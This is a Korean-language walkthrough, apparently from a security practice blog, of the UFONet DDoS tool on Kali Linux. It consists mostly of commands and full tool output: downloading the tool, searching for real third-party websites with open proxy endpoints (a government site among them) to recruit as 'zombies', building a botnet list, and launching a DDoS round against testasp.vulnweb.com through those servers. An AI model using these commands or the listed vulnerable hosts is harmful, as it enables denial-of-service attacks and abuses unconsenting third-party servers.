UFOnet Tool - zombie attack
이 실습은 좀비 PC를 인터넷에서 찾은 후 타겟 시스템을 좀비PC를 이용하여 DDoS공격을 하는 시나리오이다. 사용되어진 툴은 ufonet이다.
1. 칼리 리눅스 에서 ufonet툴을 다운로드 받는다.
https://sourceforge.net/projects/ufonet/files/latest/download
wget https://jaist.dl.sourceforge.net/project/ufonet/ufonet-v1.3.zip
2. 다운받은 툴을 압축을 해지한다.
root@kali:~# unzip -x ufonet-v0.8.zip
unzip -x ufonet-v1.3.zip
3. 압축 해지한 디렉터리로 이동한다.
cd /root/ufonet
4. 툴을 이용하여 좀비PC를 찾아보자.
root@kali:~/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
|
=============================================================== 888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888 UFONet - DDoS Botnet via Web Abuse - by psy =============================================================== Searching for NEW 'zombies' (not present on your list) using: google ====================== [Error] - This search engine is not supported! Wanna try a different search engine (Y/n) Y (다른 서치엔진을 시도해보자)
Search engines available: (가능한 서치엔진을 안내해준다.)
-------------------------
+ bing
+ yahoo
-------------------------
Ex: ufonet -s 'proxy.php?url=' --se 'bing'
Bye! |
|
UFONet - DDoS Botnet via Web Abuse - by psy
==================================================================
Searching for NEW 'zombies' (not present on your list) using: yahoo
======================
+Victim found: https://armwrestling-rus.ru/proxy.php?url=
------------
+Victim found: https://geecon.ru/proxy.php?url=
------------
+Victim found: http://www.coolespiele.com/proxy.php?url=
------------
+Victim found: http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url=
------------
+Victim found: http://inchscaled.com/imgproxy.php?url=
------------
+Victim found: https://flex.nationsds.com/proxy.php?url=
------------
+Victim found: http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url=
------------
+Victim found: https://services.aspectfoundation.org/hf/resource_proxy.php?url=
------------
======================
+Possible Zombies: 8 (사용가능한 좀비 PC 8)
======================
Wanna check if they are valid zombies? (Y/n) y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 8
---------------------
Zombie: www.kaixin001.com
Status: Ok [200]
----------
Zombie: www.coolespiele.com
Status: Ok [200]
----------
Zombie: flex.nationsds.com
Status: Ok [200]
----------
Zombie: inchscaled.com
Status: Ok [302]
----------
Zombie: armwrestling-rus.ru
Status: Ok [200]
----------
Zombie: geecon.ru
Status: Ok [200]
----------
Zombie: services.aspectfoundation.org
Status: Ok [200]
----------
Zombie: www.gosstandart.gov.by
Status: Ok [200]
----------
==================
OK: 8 Fail: 0
==================
======================
Checking for payloads:
======================
Trying: 8
---------------------
Vector: http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://inchscaled.com/imgproxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://www.coolespiele.com/proxy.php?url=
Status: Not ready...
----------
Vector: https://flex.nationsds.com/proxy.php?url=
Status: Not ready...
----------
Vector: https://armwrestling-rus.ru/proxy.php?url=
Status: Not ready...
----------
Vector: https://services.aspectfoundation.org/hf/resource_proxy.php?url=
Status: Not ready...
----------
Vector: https://geecon.ru/proxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url=
Status: Waiting to your orders...
----------
==================
OK: 4 Fail: 4
==================
==================
Army of 'zombies'
==================
------------------
Total Army: 4
------------------
Wanna update your army (Y/n) y
-------------------------
[Info] - Botnet updated! ;-) |
|
888 888 8888888888 .d88888b. 888b 888 888
888 888 888 d88P Y888b 8888b 888 888
888 888 888 888 888 88888b 888 888
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
888 888 888 888 888 888 Y88b888 d8P Y8b 888
888 888 888 888 888 888 Y88888 88888888 888
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
UFONet - DDoS Botnet via Web Abuse - by psy
==================================================================
Inspecting target to find the best place to attack... SSssh!
======================
+Image found: Images/logo.gif
(Size: 4933 Bytes)
------------
+Style (.css) found: styles.css
(Size: 3390 Bytes)
------------
+Webpage (.html) found: Templatize.asp?item=html/about.html
(Size: 3700 Bytes)
------------
+Webpage (.asp) found: Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp
[Error] - Unable to retrieve info from Webpage
(Size: 0 Bytes)
------------
+Webpage (.asp) found: Search.asp
(Size: 1919 Bytes)
------------
===================================================================
Total objects found: 5
--------------------
images: 1
.mov : 0
.jsp : 0
.avi : 0
.html : 1
.mpg : 0
.asp : 2
.mp3 : 0
.js : 0
.ogv : 0
.wmv : 0
.css : 1
.mpeg : 0
.xml : 0
.php : 0
.txt : 0
.webm : 0
.ogg : 0
.swf : 0
--------------------
=================================================================
=Biggest File: http://testasp.vulnweb.com/Images/logo.gif
================================================================ |
|
|
root@kali:~/ufonet# ./ufonet -t 'botnet/zombies.txt' -a http://testasp.vulnweb.com
===========================================================================
888 888 8888888888 .d88888b. 888b 888 888
888 888 888 d88P Y888b 8888b 888 888
888 888 888 888 888 88888b 888 888
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
888 888 888 888 888 888 Y88b888 d8P Y8b 888
888 888 888 888 888 888 Y88888 88888888 888
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
UFONet - DDoS Botnet via Web Abuse - by psy
===========================================================================
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 14
---------------------
Zombie: www.kaixin001.com
Status: Ok [200]
----------
Zombie: validator.w3.org
Status: Ok [200]
----------
Zombie: inchscaled.com
Status: Ok [302]
----------
Zombie: geecon.ru
Status: Ok [200]
----------
Zombie: www.gosstandart.gov.by
Status: Ok [200]
----------
==================
OK: 5 Fail: 0
==================
======================
Checking for payloads:
======================
Trying: 5
---------------------
Vector: http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://inchscaled.com/imgproxy.php?url=
Status: Waiting to your orders...
----------
Vector: https://geecon.ru/proxy.php?url=
Status: Waiting to your orders...
----------
Vector: https://validator.w3.org/check?uri=
Status: Waiting to your orders...
----------
Vector: http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url=
Status: Waiting to your orders...
----------
==================
OK: 5 Fail: 0
==================
==================
Army of 'zombies'
==================
------------------
Total Army: 5
------------------
Wanna update your army (Y/n)y
-------------------------
[Info] - Botnet updated! ;-)
===========================================================================
888 888 8888888888 .d88888b. 888b 888 888
888 888 888 d88P Y888b 8888b 888 888
888 888 888 888 888 88888b 888 888
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
888 888 888 888 888 888 Y88b888 d8P Y8b 888
888 888 888 888 888 888 Y88888 88888888 888
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
UFONet - DDoS Botnet via Web Abuse - by psy
=======================================================
Attacking: http://testasp.vulnweb.com
=======================================================
=====================
Round: 'Is target up?'
=====================
[Info] From here: YES
---------------------
[Info] From exterior: YES
---------------------
[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N) y
==========================================
Starting round: 1 of 1
==========================================
[Info] Deploying heavy alien troops with 'laser-cannon' weapons...
[Info] Firing from: http://nibbler.silktide.com/en_US/report/submit
[Info] Deploying droids with 'light-laser' weapons...
[Info] Firing from: http://jigsaw.w3.org/css-validator/validator?uri=testasp.vulnweb.com&profile=css3&usermedium=all&vextwarning=true
[Info] Aiming 'plasma' cannon reflector turrets...
[Info] Firing from: http://cheeseballchick.com/xmlrpc.php
[Info] Sending your 'herd' of zombies...
[Info] Attacking from: www.gosstandart.gov.by
[Info] Attacking from: www.kaixin001.com
[Info] Attacking from: validator.w3.org
[Info] Attacking from: geecon.ru
[Info] Attacking from: inchscaled.com
[Info] Flying some UCAV with 'heat-beam' weapons...
[Info] UCAV: http://www.downforeveryoneorjustme.com/ -> HIT! || Report: ONLINE! [Keep shooting!]
---------------------
==========================================
Herd statistics
==========================================
Zombie : http://inchscaled.com/imgproxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:02.897262 total 0:00:02.897262 min 0:00:02.897262 avg 0:00:02.897262 max
Sizes: 2.6KiB total 2.6KiB min 2.6KiB avg 2.6KiB max
---------------------
Zombie : https://geecon.ru/proxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:01.865758 total 0:00:01.865758 min 0:00:01.865758 avg 0:00:01.865758 max
Sizes: 3.2KiB total 3.2KiB min 3.2KiB avg 3.2KiB max
---------------------
Zombie : http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:00.451141 total 0:00:00.451141 min 0:00:00.451141 avg 0:00:00.451141 max
Sizes: 35.5KiB total 35.5KiB min 35.5KiB avg 35.5KiB max
---------------------
Zombie : http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:02.094619 total 0:00:02.094619 min 0:00:02.094619 avg 0:00:02.094619 max
Sizes: 131.1KiB total 131.1KiB min 131.1KiB avg 131.1KiB max
---------------------
Zombie : https://validator.w3.org/check?uri= | 1 hits 0 fails 0 retries
Times: 0:00:02.600004 total 0:00:02.600004 min 0:00:02.600004 avg 0:00:02.600004 max
Sizes: 13.6KiB total 13.6KiB min 13.6KiB avg 13.6KiB max
---------------------
====================================================================
Zombie 0day: http://inchscaled.com/imgproxy.php?url= with 1 hits
====================================================================
Total invocations: 5 | Zombies: 5 | Hits: 5 | Fails: 0
Total time: 0:00:09.908784 | Avg time: 0:00:01.981757
Total size: 185.9KiB | Avg size: 37.2KiB
---------------------
==========================================
Troops statistics
==========================================
Aliens: 1 | Hits: 1 | Fails: 0
Droids: 1 | Hits: 1 | Fails: 0
UCAVs : 1 | Hits: 1 | Fails: 0
XRPCs : 1 | Hits: 1 | Fails: 0
---------------------
=====================
[Info] - Attack completed! ;-)
root@kali:~/ufonet#
참조사이트 : https://ufonet.03c8.net/
참조 사이트 :
